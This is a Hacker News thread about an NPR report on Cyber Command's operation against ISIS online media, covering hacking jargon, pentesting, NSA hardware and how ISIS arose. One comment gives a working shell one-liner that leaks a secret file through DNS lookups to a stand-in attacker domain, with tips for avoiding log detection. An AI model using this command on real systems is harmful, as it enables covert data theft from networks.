I fully understand that the operation is classified and details cannot be revealed, but I have to say: the description of the technical details is still a bad Hollywood movie [0]...
> After that, the momentum started to build. One team would take screenshots to gather intelligence for later; another would lock ISIS videographers out of their own accounts.
> "Reset Successful" one screen would say.
> "Folder directory deleted," said another.
Folder directory??? Did they also delete the "file document"?
> The screens they were seeing on the Ops floor on the NSA campus were the same ones someone in Syria might have been looking at in real time, until someone in Syria hit refresh. Once he did that, he would see: 404 error: Destination unreadable.
404 error: Destination unreadable??? At least, use "unreachable"...
> "Target 5 is done," someone would yell.
> Someone else would walk across the room and cross the number off the big target sheet on the wall. "We're crossing names off the list. We're crossing accounts off the list. We're crossing IPs off the list," said Neil. And every time a number went down they would yell one word: "Jackpot!"
[0] TV Tropes: Hollywood Hacking is when some sort of convoluted metaphor is used not only to describe hacking, but actually to put it into practice. Characters will come up with rubbish like, "Extinguish the firewall!" and "I'll use the Millennium Bug to launch an Overclocking Attack on the whole Internet!" https://tvtropes.org/pmwiki/pmwiki.php/Main/HollywoodHacking
The article is different from what was aired, which appears to me to be more interesting, as it starts with:
"On August 24, 2015, a 21-year-old British hacker named TriCk stepped out of an Internet cafe in Raqqa, Syria, and climbed into his car. He didn't know it, but he'd been under surveillance for days. He pulled into a gas station, and just as he started filling the tank, a single Hellfire missile came down on him like a meteor from the sky. He was killed instantly."
https://xkcd.com/538/ with a USD 70k wrench? (even at that price, and including delivery, those wrenches sound much cheaper than Operation Glowing Symphony as described, involving headcount from at least three eyes)
Kipling on empire, in Her Majesty's Servants (a story addressed to children but not necessarily intended for them):
> "But are the beasts as wise as the men?" said the chief.
> "They obey, as the men do. Mule, horse, elephant, or bullock, he obeys his driver, and the driver his sergeant, and the sergeant his lieutenant, and the lieutenant his captain, and the captain his major, and the major his colonel, and the colonel his brigadier commanding three regiments, and the brigadier his general, who obeys the Viceroy, who is the servant of the Empress. Thus it is done."
> "Would it were so in Afghanistan!" said the chief; "for there we obey only our own wills."
> "And for that reason," said the native officer, twirling his moustache, "your Amir whom you do not obey must come here and take orders from our Viceroy."
Returning to the topic and 2020, from the transcript of the 50-minute show I've mentioned:
"Nakasone said the American people shouldn't worry about the 2020 elections because Cybercom is prepared to prevent the Russians from repeating what they did in 2016."
"TEMPLE-RASTON: Even saying that much is new. Remember - offensive cyber not so long ago was something they didn't talk about, and now, all of a sudden, they seem to be. So why is General Nakasone talking about this now?
DEIBERT: What's happening here is part of a deterrent justification."
Then they give an explanation of this using some lines from Dr. Strangelove.
By the way, the show was "written and hosted by Dina Temple-Raston," who also wrote the article, and I liked the show.
-----
Edit: responding to "deterrent could easily be communicated privately" below: -- no, that's too narrow thinking: consider the potential target as "anybody who'd be willing to try it at home." That's a much bigger target group than potential workers. Also consider every "it" that people would be potentially scared to do.
Edit2: re. the edit of the post below involving joke with the submarines -- I fail to see any relation to anything discussed here, and I'd also like to know if anybody but the writer even understands what the joke is. I honestly don't. Meh.
Edit3: re "MAD": Like I've said I don't believe it's about MAD, but "anybody who'd be willing to try it at home." Anybody in front of the computer anywhere in the world, including, but not exclusively, some future "Junaid Hussain." (and, if I'm closer to the correct answer, Cybercom can give me 10 upvotes here).
Edit4: I think I understand it now after
it's added that the "joke meant to illustrate MAD" -- I guess he didn't follow the link, but reacted to "Dr. Strangelove" reference believing it's about MAD, even if it never was. As per transcript, it's there to argue: "if you keep it a secret [i.e. American offensive cyber operations] - you could say the same thing about American offensive cyber operations. They've been so stealthy for so long, maybe people don't realize the U.S. has them." Note "people." As is, people wouldn't be scared to do something the U.S. doesn't like, instead of thinking who'd be the target of next U.S. drone attack.
Sorry, I was reacting to the Dr. Strangelove from the article, especially the "end of"[1] description. Maybe it was more obvious in the transcript? I believed it to be about MAD because who, since 2010 (Stuxnet), could plausibly believe that non-decisive[2] American offensive cyber operations are not at least a potential thing?
As written in https://news.ycombinator.com/item?id=24522125 I don't believe everyone apparently having more offensive than defensive capability is necessarily the most stable of situations.
Not having the whole story arc about Junaid Hussain is the main difference between the show (as seen in the transcript) and the article. I was talking about the former from the start, as it can be easily seen.
The point in the article after mentioning Dr. Strangelove uses however the same wording that I've pointed to:
"You could say the same thing about American offensive cyber operations. They have been so stealthy for so long, maybe people don't realize we have them."
==== Edit: joke meant to illustrate (b), the Assured Destruction part that makes MAD a non-iterated game. I agree that if TFA is not about MAD, then threatening Proportional Inconvenience can be an effective deterrent in an iterated game, a deterrent much more applicable to future Hussains than to future Bystrovs. (indeed, in that scenario, I would worry about non-nuclear powers swatting each other via Uscybercom) ====
In the middle of the Carribean, a US sub, gleaming and spotless, surfaces next to a dingy-in-comparison russian sub, whose boomers are sprawled out in undershorts and telnyashki, listlessly passing around vodka bottles across a littered foredeck.
One of them is murmuring over and over again, "which one of you idiots threw slippers on control board?"
On the US sub, a dress-uniformed officer in Randolph Engineering glasses emerges from the hatch. "This is the Captain of the USS Alaska. May I speak with your captain, please?"
On board the russian sub, the only response is the clinking and refilling of glasses.
"I repeat, I am Commander William Dull, captain of the USS Alaska, SSBN 732. I would like to speak with your captain!"
A small fight breaks out on the russian sub over who last poured.
"Damn it, what is up with you russkies? Do you call that shipshape? At least we learn discipline back home at King's Bay! Di. Sci. Pline!"
"Don't you get it?" yells back the murmuring russian, in english now. "Is no King's Bay any more." Then he recommences his russian refrain, a little more loudly, "Oi, which one of you idiots threw valenki on control board?"
> Folder directory??? Did they also delete the "file document"?
I obviously don't know how accurate this piece is but a "folder directory" is, or at least used to be, a legit way to describe a folder full of folders.
You'll see outdated/unorthodox terminology like this all the time in old systems, and even some newer ones that were built or maintained by people who aren't native English speakers. Daily WTF used to be filled with this kind of stuff.
Ok, I'll tell you how it goes in the real world. I worked for a somewhat HN-famous pentesting company several years ago.
"So, X has been infiltrating <company> for the past few days."
"Really? <company>? <famous company>?"
"Yep. We're keeping them looped in on everything, and they told us to try to get as far as possible. Apparently they were running <outdated version> of <software> on one of their boxes, and <scanner> picked it up."
"That actually happens?"
"He's <highly surprising claim> right now. You'd be surprised how far you can get, jumping from one box to another."
I can't give much more detail than that, for obvious reasons, but the reality is that it's very methodical, very "boring" work. It's basically a giant matrix of probabilities: there are hundreds of thousands of attack vectors, and your job is to tap as many as possible, sorted by probability of effectiveness, until something sticks. Then use your head to get further, adapting to the situation on the fly.
And ... writing reports. Jesus, if someone had told me that 70% of your day would be spent writing reports, I probably wouldn't have joined. But the 30% of other stuff made up for it.
That feeling you get when you break into somewhere you're not supposed to be, and that you were paid to do it, is amazing. The rules change from engagement to engagement, but usually it's "do whatever you want, but don't modify any data, i.e. no destructive actions, and all info you've collected will be deleted at the end of the engagement."
Must be interesting to be a spook in the NSA doing that kind of stuff offensively.
Also, it might seem absurd that I'm comparing this story to the most elite hackers in the developed world. And maybe it is. But if you knew which <company> it was, and exactly what <highly surprising claim> was, you'd be shocked that one or two smart developers poking at internals were able to compromise the entire corporate network of <famous company>, to the point of being able to... well. Let's just say, I wish I could say. It's a weird feeling, seeing it with my own eyes, knowing it's true, and never being able to talk fully about it. :)
So I imagine the NSA spooks are doing similarlly-methodical work, with some cheat codes like "we intercepted their computer before delivery and installed a backdoor that only activates when we send a specially malformed packet that would normally be dropped and is therefore invisible, which grants us access as needed."
as far as I understand error correcting codes can and are used at different levels of communication protocols (hardware each link, hardware at endpoints, software at end points, ...)
I often wonder if recoverable errors at the endpoints are ever used to exfiltrate data? the higher levels of the stack would see the corrected overt message, while underlying levels (hardware or software) that perform the error correction has access to the covert information encoded in the error.
This may be testable by FPGA and sorting connections by protocol, origin, destination, ... to identify connections with suspiciously high amount of ECC recoverable errors as compared to the rest.
This may be very hard to test if MitM'ed (by ISP, network card manufacturer, ...) such that benign packets get recoverable errors introduced as well (to hide the malicious ones in the noise), which would increase the complexity since now the malicious hardware or software at the endpoints needs to discriminate artificial errors from covert messages over the error channel. There would be many ways of going about this.
If the cheat codes were along the lines of "as long as they're using anyone's routers but Huawei's" they would not even require interception and customisation.
I wish I understood it better, because it's a real technique that the NSA uses, as far as I know. And I agree that it seems like it shouldn't be that simple.
Here's one I do understand: Suppose you want to exfiltrate some data out of a network without raising alarms. One way to do it is to set up a DNS server. Basically, you use DNS itself as a communication method, not merely a lookup table.
I've never actually used it, but it always seemed a cool idea. Almost no one blocks DNS, which means you can send data from anywhere in the world in a very unexpected way. You'd of course want to keep the transmission size reasonable (perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your special server>` on. So this technique works in almost every case, except extremely monitored systems that only allow outgoing connections to a specific set of restricted IP addresses.
But for the special network protocol that the NSA uses to access backdoored NICs, I forget why it works, since the packet would need to pass through many routers along the way. In fact, I feel like I'm misremembering. Most target computers are behind routers, so it really doesn't make sense. Maybe it's a technique used against routers themselves. All I remember is that the NSA has some type of "signals we can send which normal networking tooling doesn't detect at all," along with a dose of "we know Iran just ordered some new servers, so we intercepted the servers and installed a backdoor." (The latter is called TAO: https://en.wikipedia.org/wiki/Tailored_Access_Operations)
They definitely do something with NICs though. The ANT document (https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...) shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing approximately $1.25M for 50 units." Must be one hell of a plug.
https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS... is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs it in to the target device. I wonder what the range on stuff like that is... Seems like you'd have to be sitting outside in a van or something, which is rather hard to do if your target is a nuclear enrichment facility (stuxnet).
Extremely monitored systems should probably communicate by tape, or cdrom, or similar write-mostly data diode medium. I've heard the US launch network updated mostly via paper tape for a long time. Today it occurred to me that people could, in principle, hand verify that two short paper tapes were identical, without needing to trust the integrity of any technological black boxes.
you'd be able to `nslookup foo.com <your special server>` on
You don’t need to tell nslookup to use a special server. If you control the SOA for your own domain, the normal DNS server will happily exfiltrate your data for you.
Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server I ran on my colocated rack to allow me to surf the wider web when my laptop was connected to Wi-Fi captive portals.
The technique worked well for portals that allowed arbitrary DNS-over-UDP as well as portals that had their own exclusive DNS - provided that those portals worked by redirecting all IP traffic (i.e. they didn't fake DNS results).
It was slow though... I think I maxxed-out at around 8KBps (~64kbps) - barely enough for basic email functionality and text-only web-surfing.
Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server
It's even easier that if you just want to sneak a relatively small file out.
for n in $(base64 mysecretfile|sed 's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done
Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.
§ 5707 (c)(2): "the implications of [5G] global and regional adoption on
the cyber and espionage threat to the United States, the
interests of the United States, and the cyber and collection
capabilities of the United States;"
It is very possible they are using utilities to pull this off developed by someone else. They may have training for the utilities they have but that doesnt make them IT experts.
> "The United States is the country most highly dependent on these technologies," Deibert said. "And arguably the most vulnerable to these sorts of attacks. I think there should be far more attention devoted to thinking about proper systems of security, to defense."
It's all fun and games until someone melts down a reactor.
It's kind of odd to think what ISIS' media operations brought it. Initially they seem to have garner a variety of international recruits, I most from a Muslim background but some not. But either way, a lot of their appeal was an absolute nihilistic rejection of "modernity". It seems like the appeal involve a kind of fundamental alienation combined with being a flavor of the month - sort of the appeal of leftism but lacking any sense that things can be improved.
I suspect shutting down their media probably stopped having an effect through novelty wearing off, all the best recruits being recruited and the world moving on to (inadvertently or not) selling some other reactionary rebellion - and the group being militarily defeated in Syria.
One of the lightly ironic points Linebarger (in his textbook, Psychological Warfare) makes is: never trust a psywar person as a reliable narrator, to accurately and straightforwardly report how effective they may have been. Their déformation professionelle is, after all, self-serving sophistry.
(I trust Linebarger more than Bernays because the former also catalogues not only his failures, but sotto voce, even touches upon those of his mid-twentieth century society.)
"a nearly two decades long anti-Chinese covert operation focused on Tibet which consisted of "political action, propaganda, paramilitary and intelligence operations""
"Although it was formally assigned to the CIA, it was nevertheless closely coordinated with several other U.S. government agencies such as the Department of State and the Department of Defense."
Dalai Lama is where he is now as the result of this.
Up until today, I had thought of the (obviously shopped) https://demotivation.me/images/20140405/rhq85mwjl9qh.jpg as inaccurate because while it seems plausible for spooks to do such things, they don't wear fatigues. (compare ops room hero photo above: is the fatigue-wearer a seppo liaison?)
The original picture, showing the U.S. soldiers in front of the computers in the 2010 Wired article about the NSA and the Department of Homeland Security:
"Doc of the Day: NSA, DHS Trade Players for Net Defense"
Thanks for the op. I had been guessing (from the steering wheel) that it was a joint force LAN party, but now that I'm no longer distracted by cyrillic, I'm wondering about the yellow left-hand keycaps?
> "But there are U.S. intelligence officials who still worry about what Cyber Command’s rise will mean for espionage missions."
suggests another domestic explanation for revealing Glowing Symphony would be turf wars with non-concurring bureaucracies.
(Apparently successfully, judging by 2020 changes to us code buried somewhere in the appropriations bill S.1790 § 1632.
Poorer US HN'ers may be interested to know there's also language in that bill about cyber pay rates, which I left unread but would guess implies they're attempting to be competitive with private sector compensation.)
Darknet diaries covered this story in a podcast ages ago. NPR is just recycling the content. Full episode here for those interested: https://darknetdiaries.com/episode/50/
For the audio version of this story from a different source, I highly recommend the Darknet Diaries podcast episode: https://darknetdiaries.com/episode/50/
Not sure if the article mentions it (haven't read it yet) but JTF-ARES was the force tasked with sabotage and often it was against targets such as the militants video (propaganda) productions.
Edit: Really not sure why I got downvoted, as I provided accurate info?
Can't speak for anyone else but I didn't understand the purpose of your comment; it merely restates one fact from the article, which you didn't bother to read before commenting.
> I mean, I’m just guessing here but here’s an attack I think they probably did; first, imagine if they hacked into the phone of one of these ISIS media people and then on that phone, they stole the private decryption keys for that phone. This would be the key used to decrypt messages to that phone. Then, imagine they hacked into the WiFi network that phone was on and somehow captured all the traffic to that phone. Somewhere in that traffic are the private chat messages to that phone and with these private keys, I’m guessing it’s technically possible to decrypt those messages. This would be a pretty complex hack but I bet it’s something that US Cyber Command could do.
TL;DR: "Fire" (from the first sentence) wasn't shooting something but the beginning of a cyber exercise. Started with a successful phishing email and got lucky because an ISIS operative was re-using the same password in several places.
In a way doesn't this just cause the adversary to adopt better operational practices? Persistent access and monitoring would probably be better long term.
Think about Enigma and Lorenz, or any cold war double agent - you've got this fountain of knowledge but if you start burning assets left right and centre they'll realize something's wrong (Or in the case of MI6 they'll get embarrassed and allow the double agent to slip away as long as they shut up)
Having been thinking that cyberwar could be a wonderful thing if it keeps everyone occupied and well away from civilian lives, as long as I was in cloud cuckoo land I figured we (the non-inclusive we, meaning: anyone but me) ought to set up a giant (bits, not atoms, remember?) online honeypot that gets spooks in so deep that they become N-tuple agents (where N is chosen sufficiently large to overflow their mental stacks, allowing us to set them to chasing each other in cyclical patterns) and eventually wind up typing in gibberish in grand operations that, like the coruscating beams of an E.E. "Doc" Smith novel, escalate to grappling with networks of cosmic proportions, but in truth are on the wrong side of an impedance mismatch to affect the real world.
> "If you feel like showing off, average everything into everything else and call it the Gross Index of Total Enemy Morale. This won't fool anyone who knows the propaganda business, and you won't be able to do anything with or about it, but you can hang it on a month-by-month chart in the front office, where visitors can be impressed at getting in on a military secret. (Incidentally, if some smart enemy agent sees it and reports it back, enemy intelligence experts will go mad trying to figure out just how you got that figure. It's like the old joke that the average American is ten-elevenths White, 52% female, and always slightly pregnant.)"
TIL CthulhuPunk is a thing.
Anyone familiar enough with the Cthulhu-mythos to tell me if there are any impediments in canon to the following retcon: what if Great Old Ones are Scissor Entities, and appear to xenophobes as horrific monsters of vaguely anthropoid outline, with octopus-like heads and prodigious claws, but to xenophiles as animated pegasus unicorns, and, as part of their eternal struggle against the Blue Meanies, drive the former to gibbering madness but invite the latter over for tea?
Friendly reminder: the US basically created ISIS through it's hamfisted invasion of Iraq. Cheerleading tbis sort of effort is like congratulating a child when they decide to eat their peas.
Yes and no. US did also invade Afghanistan, but that didn't create a phenomenon like ISIS.
ISIS was actually there, founded by Zarqawi like any other group, but its main differentiator was its swift rise to power and popularity after 2011 benefiting from the unbearable oppression of Sunnis in Iraq by Iran and its proxy, which made them align with whoever could be their savior and get rid of the Iranian influence. You can see this clearly when ISIS stormed the prisons where thousands of Sunnis were sentenced to death, and made them into the second wave of recruits.
US did enable ISIS, Zarqawi and co created it, Iran gave people a reason to join it in mass, and international agenda, most importantly the US object to get its enemies (Iran and ISIS) bleed each other, and the Kurdish leftists to ask for its help to the degree to become its proxies, left a space for it to be the monster it was.
Can't also ignore the Turkish and Kurdistani indifference (before ISIS started attacking them, there were ISIS/Kurdistani checkpoints side by side drinking tea together), and the Syrian allowance of fighters flood to Iraq through its the eastern borders since the invasion.
Blaming only the US (although it's the initial culprit) doesn't address the complexity of this problem.
The invasion was not enough to create ISIS. To do that, US had to name an idiot as Iraq's governor. Enters Paul Bremer. A single decision of his made ISIS possible.
He got to manage a country that just got invaded, that used to have a huge military and where the occupiers are still fighting the remnants of rebel forces in some part of the country.
In that context, he decided that the former officers from Saddam Hussein's regime would be barred from the new Iraq military and that they should not receive pension either.
He, put yourself in their shoes: when your job is to organize a military, that the only lawful employer refused your services and denies your pension, are you going to go homeless and beg in the streets or are you going to join a rebellious startup?
The ISIS of the origin was organized just like the Baath army was, because that's the framework the officers knew. There were some documents captured (that involved less "hacking" than physical invasion of command structures but of course we never know the amount of covert ops going on) and what they revealed was that one budget line was the biggest of the whole organization: pensions. Suicide bombing is not the career path everybody chose there.
ISIS is not a US creation: that would imply GWB's administration capacity to plan such a thing. But it came from crucial mistakes the US did despite being warned about these years prior.
I recommend the book "The ISIS apocalypse: The history, strategy, and doomsday vision of the Islamic State", if anything else it makes for fascinating reading.
The apocalyptic aspect (literally), for instance, is essential to understand ISIS, and it's early split from Al-Qaeda, for example.
That's really being generous. Turkey and Qatar directly financed ISIS and facilitated movements of terrorists. People were recruited in countries like Tunisia through mosques, some of them very far from being a committed to the religion. The jackpot was money to be paid, and whatever "pussy" your hands can get once you are in Syria.
The US turned a blind eye because ISIS was fighting a regime they wanted to change. They could have pressured Turkey and Qatar to stop; and they would oblige. But everything has a cost I guess.
While some of this may have happened, both Turkey and Qatar's assistance is dispute, reports say 70% of members in Syria were Syrian and 90% of members in Iraq were Iraqi. The leadership has been full of former members of the Ba'ath army and intelligence agencies who lost their jobs during De-Ba'athification.
Stopping the help provided by outside countries may have weakened the movement, but not prevented it.
The US finances many terrorist groups ourselves, so I'm not sure what your point is—nations are happy to take advantage of new powers regardless of how it conflicts with their propaganda. I don't know how you could look at the invasion of Iraq and come away with the conclusion that ISIS is either surprising or could have formed without our help.
I believe the issue is not the invasion itself but what they did/didn't do after they "won".
It's indeed sad to see no good side/party. Just a mess that brought a lot of misery.
Unless an explicit claim to hegemony is involved, when a party isn't part of the country involved, we normally don't say "civil" but instead "proxy" warfare.
As CIA and the Pentagon support different sides in Syria, does this imply they're likely running offensive ops against each other? Do black (psywar) black (hat) hackers have any sort of IFF to prevent blue-on-blue?
(for a different blue-on-blue scenario: what might the cyber equivalent of leaving a grenade pin on an officer's pillow be?)
And how would the Arab spring have gone with Saddam still in power? It's too simple to boil the situation down to one sentence; that also ignores that Hussein was a brutal Tyrant who had used Weapons of Mass destruction (Chemical Weapons including Mustard Gas and Nerve Agents) as part of a genocide against the Kurds.
The invasion wasn't the hamfisted part - the problem was being reckless after the invasion and not really thinking properly about how to manage the country.
> Dropping bombs is like taking antibiotics, sometimes necessary but always creates resistance.
Does taking antibiotics always result in antibiotic resistant bacteria?
I wasn't aware of that, and at first glance it seems implausible as otherwise all antibiotics would have been ineffective before we even discovered them?
> that also ignores that Hussein was a brutal Tyrant who had used Weapons of Mass destruction (Chemical Weapons including Mustard Gas and Nerve Agents) as part of a genocide against the Kurds.
And who supplied those weapons of mass destruction to saddam? I wonder...
Maybe unintentionally enabled, but I am pretty sure the elements of ISIS were around well before the invasion. After all, what is Assassin's Creed based on?
ISIS was founded earlier, yes, but it only became so "successful" because of Ba'athist officers who were little more than mercenaries with no place to go after the dissolution of Sadam's regime. They needed to survive somehow and so many ended up going to ISIS that it turned into a full blown military force with fully trained Iraqi officers, all of them veterans of at least one war, with tons of left over American and NATO hardware.
I won't go so far as to say that the whole fiasco could have been avoided with a functioning economy and some new civil service/protection branch to absorb the officers, but the US's strategy was one of the biggest contributors to ISIS's growth.
I'm guessing because either you'd be tried for crimes committed under Sadam, or because your old enemies would be in the new government and just kill you without the trial step.
This seems dumb on the part of the bank. Unless terrorists are really, really stupid, classifying the first name "Isis" as "terrorist" is bound to have a 100% false positive rate.
It's cause the banks keep getting sued by the US govt and the US govt keeps siding with the US govt that the banks violated sanctions.
So banks then do ridiculous things like checking your timezone and checking your name and the memo fields so they get to have a stronger defense in court.
I recently used paypal to send a dollar to a coworker with the description of “tardigrade”, after reading a story on HN about how they were blocking transactions containing that string.
Sure enough, the transaction was blocked, my account was disabled, and I had to send paypal an email saying that I wasn’t an arms dealer.
Dunno why this is being downvoted - i once jokingly added a note mentioning “meth” paying someone for dinner (in reference to our conversation at said dinner) and google suspended my account temporarily and cancelled the transaction
It was (probably) capitalized in the original submission. But Hacker News's title autoformatting screwed it up, again. It's known to capitalize individual words but removing all-caps acronyms.
It's the annoying part. The anti-all-caps-clickbait system knows some common abbreviations, but not others. For example, on multiple occasions, "MIT" was not unaffected but "CSAIL" was turned into "Csail", see [0].
There is definitely some find-and-replace code. After you click the submission button, the title is immediately "corrected" (submitters can manually edit the title back later), with good intention - anti-clickbait. It basically does three things: remove superfluous words, remove superfluous caps, and properly capitalize the title. Most of the time it works well, but annoying when there's a false-positive.
Examples I've seen so far (note that it's not always triggered, there must be some "if" conditions here. It's not always reproducible).
* All lower-case titles are capitalized.
Generally good, but not always enforced, it's strange.
* Unnecessary caps are removed.
Many false positives. "MIT CSAIL" becomes "MIT Csail", DARPA becomes "Drapa", etc.
* "%d Ways To Do X" and "How To Do X" becomes "Do X", per Guideline.
It misfired when I tried to submit "20 °C – A Short History of the Standard Temperature for Dimensional Measurements" by NIST. The "20" was removed and I had to edit it back!
A submission of "How we threat model" by GitHub became "We threat model", makes the already-short title unreadable.
* Clickbait words are removed.
Generally good. But false positives exist. For example, "Massive Parallel" is a legitimate concepts in computing, but the word "massive" will be removed. I just tried "Massive MIMO", which is similarly a legitimate concept in communication, got removed as well.
Try submitting this paper "Pilot Optimization and Channel Estimation for Multiuser Massive MIMO Systems" (https://arxiv.org/abs/1402.0045), you'll see that the word "massive" is deleted immediately after submission (but as I said, the reformatter is not always triggered and not always reproducible, perhaps your high karma will stop the filter from doing it).
* "Your Statement is 100% correct" becomes "Statement is 100% correct".
This is a good one, the unnecessary personal element is removed.
Thanks for the detailed examples. Maybe it's karma threshold, maybe a bug, or maybe I never wrote a title that would trigger the autoformatter, but I never noticed it.
Plenty of style guides [0] recommend lower case or title case for acronyms or initialisms pronounced as words (e.g. Nasa, Opec, scuba, radar in increasing order of how likely you are to actually see them written that way). It's silly to insist that HN follow your preferred style.
> After that, the momentum started to build. One team would take screenshots to gather intelligence for later; another would lock ISIS videographers out of their own accounts.
> "Reset Successful" one screen would say.
> "Folder directory deleted," said another.
Folder directory??? Did they also delete the "file document"?
> The screens they were seeing on the Ops floor on the NSA campus were the same ones someone in Syria might have been looking at in real time, until someone in Syria hit refresh. Once he did that, he would see: 404 error: Destination unreadable.
404 error: Destination unreadable??? At least, use "unreachable"...
> "Target 5 is done," someone would yell.
> Someone else would walk across the room and cross the number off the big target sheet on the wall. "We're crossing names off the list. We're crossing accounts off the list. We're crossing IPs off the list," said Neil. And every time a number went down they would yell one word: "Jackpot!"
[0] TV Tropes: Hollywood Hacking is when some sort of convoluted metaphor is used not only to describe hacking, but actually to put it into practice. Characters will come up with rubbish like, "Extinguish the firewall!" and "I'll use the Millennium Bug to launch an Overclocking Attack on the whole Internet!" https://tvtropes.org/pmwiki/pmwiki.php/Main/HollywoodHacking